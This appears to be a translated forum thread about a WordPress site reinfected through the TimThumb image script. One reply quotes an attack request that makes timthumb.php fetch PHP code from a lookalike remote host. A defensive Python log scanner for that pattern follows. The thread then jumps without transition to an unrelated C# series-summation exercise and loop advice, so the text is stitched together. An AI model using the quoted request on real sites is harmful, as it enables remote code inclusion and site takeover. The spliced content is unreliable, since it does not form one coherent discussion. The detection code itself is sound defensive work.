Wordpress and Timthumb vulnerability?
Good afternoon, please help me clean a shell out of WordPress.
I have my own server with a dozen sites and two useless blogs on WordPress (3.5.1). In fact, no one except search engines visits them. Both blogs had themes from Woothemes.com and five plugins installed. I tried to update everything except the themes regularly. At some point I noticed that, through a cache.php script, these blogs were serving pages with links to other sites.
After some googling I realised the problem was the vulnerability in the Timthumb script used by the themes. I updated the theme frameworks, disabled the use of this script in the theme settings and deleted the scripts themselves from all directories. I installed the Timthumb Scanner plugin, which finds Timthumb scripts, updates them and reports whether they have already been hacked.
As a result, I now see the following picture: a couple of hours after I delete the scripts, the cache.php script reappears in /wp-content/uploads/2012/12, and its version is 2.8.10 (the latest is 2.8.11). If I update the script, a couple of hours later the version is 2.8.10 again. If I don't update it, after a while the plugin reports that the script has been hacked.
I tried disabling all plugins completely, same result. I looked at the logs, no strange requests. If I rename the index.php file in the root, the break-ins stop. I added a logger for all POST requests to index.php, nothing strange. I don't understand exactly how they are breaking in; it's obvious that it happens on the machine itself. Nothing suspicious in the ssh/ftp logs either. Has anyone run into something similar?
Look for the shell.
Compare all engine files with the originals.
No one does this by hand, it's all automated. If the index returns 404, then "no hacking is performed" - regarding the renamed index.php.
Also, it's not a fact that the hacking is done directly through the WordPress engine; here you could suspect the neighbours. Although it all depends on the server settings.
I didn't understand why you implemented a POST request logger. The bug is in the GET:
/wp-content/themes/pbv_multi/scripts/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php
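A defender-side check for the GET pattern quoted above, added here as an example and not code from the thread: it scans constructed access-log lines for timthumb.php requests whose src= names a remote host, and shows why a substring allow-list check (the kind older TimThumb releases used) accepts picasa.com.xpl.be while a host-suffix comparison rejects it. The log lines, IP addresses and the allowed-site list are constructed for the example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (not from the thread); addresses are RFC 5737 test ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Dec/2012:10:01:02 +0000] "GET /wp-content/themes/pbv_multi/scripts/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 200 512
198.51.100.7 - - [12/Dec/2012:10:02:15 +0000] "GET /wp-content/themes/pbv_multi/scripts/timthumb.php?src=http://picasa.com/photo.jpg&w=300 HTTP/1.1" 200 40231
198.51.100.9 - - [12/Dec/2012:10:03:44 +0000] "GET /wp-content/themes/pbv_multi/scripts/timthumb.php?src=wp-content/uploads/2012/12/pic.jpg HTTP/1.1" 200 30211
192.0.2.11 - - [12/Dec/2012:10:05:01 +0000] "GET /index.php HTTP/1.1" 200 8000
"""

# Assumed allow-list of remote image hosts (older TimThumb shipped a similar list).
ALLOWED_SITES = ["picasa.com", "blogger.com", "img.youtube.com"]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def legacy_allowed(host: str) -> bool:
    """Substring match as in older TimThumb: 'picasa.com' is found inside 'picasa.com.xpl.be'."""
    return any(site in host for site in ALLOWED_SITES)

def strict_allowed(host: str) -> bool:
    """Exact host or a subdomain of an allowed site; the lookalike host fails this."""
    return any(host == site or host.endswith("." + site) for site in ALLOWED_SITES)

def scan(log_text: str) -> list:
    """Return one finding per timthumb.php GET whose src= names a remote host."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET" or "timthumb.php" not in m["path"]:
            continue
        src = parse_qs(urlparse(m["path"]).query).get("src", [""])[0]
        host = urlparse(src).hostname
        if not host:
            continue  # relative path: the script serves a local file, no remote fetch
        if not legacy_allowed(host):
            verdict = "remote-host-not-allowed"
        elif not strict_allowed(host):
            verdict = "lookalike-bypass"  # passes the substring check, fails the strict one
        else:
            verdict = "ok"
        findings.append({"ip": m["ip"], "host": host, "src": src, "verdict": verdict})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['verdict']:24} {f['ip']:15} {f['host']}")
```

Run it against a real access log by reading the file into scan(); any "lookalike-bypass" or "remote-host-not-allowed" line is a request worth correlating with the reappearance times of cache.php.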
using System;

class Program
{
    static void Main()
    {
        double si = 1.0 / 6; // initial value for i = 1
        double s = 0;
        int i = 2;
        double eps = double.Parse(Console.ReadLine());
        while (Math.Abs(si) >= eps)
        {
            s += si;
            si = -1 * si * (i - 1) / (i + 2); // next term computed from the previous one
            i++;
        }
        Console.WriteLine(s);
        Console.ReadLine();
    }
}
A while loop suits you better than a for loop.
By the terms of the problem, you only need to compare the i-th term with e BEFORE it is added to s, whereas you are comparing e with s.
The incomprehensible juggling of the parameter a confuses the reader and also stops the sum from being calculated beyond 100 terms.
Assume that the required accuracy is reached when the sum of the first several terms has been computed and the next term turns out to be less than e in absolute value.